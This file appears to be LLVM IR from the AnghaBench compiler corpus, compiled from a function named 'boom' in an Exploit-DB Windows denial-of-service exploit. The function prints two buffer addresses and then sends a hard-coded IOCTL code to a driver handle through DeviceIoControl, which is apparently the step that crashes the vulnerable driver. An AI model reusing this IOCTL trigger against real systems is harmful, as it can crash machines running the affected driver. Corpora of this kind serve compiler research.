; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_15383.c_boom.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_15383.c_boom.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [19 x i8] c"userbuffer Is:%p\0A\0A\00", align 1
@.str.1 = private unnamed_addr constant [25 x i8] c"The systembuffer Is:%p\0A\0A\00", align 1
@DriverHandle = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @boom(i32 %0, i32 %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  store i32 %0, i32* %3, align 4
  store i32 %1, i32* %4, align 4
  %5 = load i32, i32* %4, align 4
  %6 = call i32 @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str, i64 0, i64 0), i32 %5)
  %7 = load i32, i32* %3, align 4
  %8 = call i32 @printf(i8* getelementptr inbounds ([25 x i8], [25 x i8]* @.str.1, i64 0, i64 0), i32 %7)
  %9 = load i32, i32* @DriverHandle, align 4
  %10 = load i32, i32* %3, align 4
  %11 = load i32, i32* %4, align 4
  %12 = call i32 @DeviceIoControl(i32 %9, i32 -2097136621, i32 %10, i32 20, i32 %11, i32 20, i32* null, i32 0)
  ret void
}

declare dso_local i32 @printf(i8*, i32) #1

declare dso_local i32 @DeviceIoControl(i32, i32, i32, i32, i32, i32, i32*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
